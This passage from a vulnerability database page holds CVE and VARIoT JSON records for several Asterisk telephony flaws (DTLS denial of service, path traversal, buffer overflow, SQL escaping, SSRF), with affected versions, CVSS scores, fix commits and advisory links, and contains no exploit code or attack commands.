"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"id": "VAR-202312-1059",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.75
},
"last_update_date": "2024-08-14T14:30:07.728000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-98rc-4j27-74hh"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/asterisk"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"date": "2024-01-05T14:31:02",
"db": "PACKETSTORM",
"id": "176383"
},
{
"date": "2023-12-14T20:15:52.260000",
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-16T02:56:00",
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"date": "2023-12-29T00:15:49.697000",
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Classic buffer overflow vulnerabilities in products from multiple vendors",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
}
],
"trust": 0.8
}
}
CVE-2023-49786 (GCVE-0-2023-49786)
Vulnerability from nvd – Published: 2023-12-14 19:47 – Updated: 2025-02-13 17:18
VLAI?
Title
Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.
Severity ?
7.5 (High)
CWE
- CWE-703 - Improper Check or Handling of Exceptional Conditions
Assigner
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:01:25.997Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-49786",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-08T14:19:55.907894Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-08T14:20:19.222Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c 18.20.1"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c 20.5.1"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c 18.9-cert6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-703",
"description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:18.647Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-hxj9-xwr8-w8pq",
"discovery": "UNKNOWN"
},
"title": "Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49786",
"datePublished": "2023-12-14T19:47:46.306Z",
"dateReserved": "2023-11-30T13:39:50.862Z",
"dateUpdated": "2025-02-13T17:18:55.224Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-49294 (GCVE-0-2023-49294)
Vulnerability from nvd – Published: 2023-12-14 19:40 – Updated: 2025-02-13 17:18
VLAI?
Title
Asterisk Path Traversal vulnerability
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.
Severity ?
4.9 (Medium)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T21:53:45.375Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c 18.20.1"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c 20.5.1"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c 18.9-cert6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:21.896Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-8857-hfmw-vg8f",
"discovery": "UNKNOWN"
},
"title": "Asterisk Path Traversal vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49294",
"datePublished": "2023-12-14T19:40:46.157Z",
"dateReserved": "2023-11-24T16:45:24.314Z",
"dateUpdated": "2025-02-13T17:18:40.277Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-37457 (GCVE-0-2023-37457)
Vulnerability from nvd – Published: 2023-12-14 19:43 – Updated: 2025-02-13 17:01
VLAI?
Title
Asterisk's PJSIP_HEADER dialplan function can overwrite memory/cause crash when using 'update'
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa.
Severity ?
7.5 (High)
CWE
- CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T17:16:30.273Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c= 18.20.0"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c= 20.5.0"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c= 18.9-cert5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:20.393Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-98rc-4j27-74hh",
"discovery": "UNKNOWN"
},
"title": "Asterisk\u0027s PJSIP_HEADER dialplan function can overwrite memory/cause crash when using \u0027update\u0027"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-37457",
"datePublished": "2023-12-14T19:43:30.945Z",
"dateReserved": "2023-07-06T13:01:36.996Z",
"dateUpdated": "2025-02-13T17:01:26.636Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-46837 (GCVE-0-2021-46837)
Vulnerability from nvd – Published: 2022-08-30 00:00 – Updated: 2024-08-04 05:17
VLAI?
Summary
res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |
|---|---|---|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T05:17:42.455Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-46837",
"datePublished": "2022-08-30T00:00:00",
"dateReserved": "2022-08-30T00:00:00",
"dateUpdated": "2024-08-04T05:17:42.455Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26651 (GCVE-0-2022-26651)
Vulnerability from nvd – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:11
VLAI?
Summary
An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:11:43.391Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26651",
"datePublished": "2022-04-15T00:00:00",
"dateReserved": "2022-03-07T00:00:00",
"dateUpdated": "2024-08-03T05:11:43.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26499 (GCVE-0-2022-26499)
Vulnerability from nvd – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03
VLAI?
Summary
An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it's possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:03:32.912Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it\u0027s possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26499",
"datePublished": "2022-04-15T00:00:00",
"dateReserved": "2022-03-06T00:00:00",
"dateUpdated": "2024-08-03T05:03:32.912Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26498 (GCVE-0-2022-26498)
Vulnerability from nvd – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03
VLAI?
Summary
An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:03:32.984Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"tags": [
"x_transferred"
],
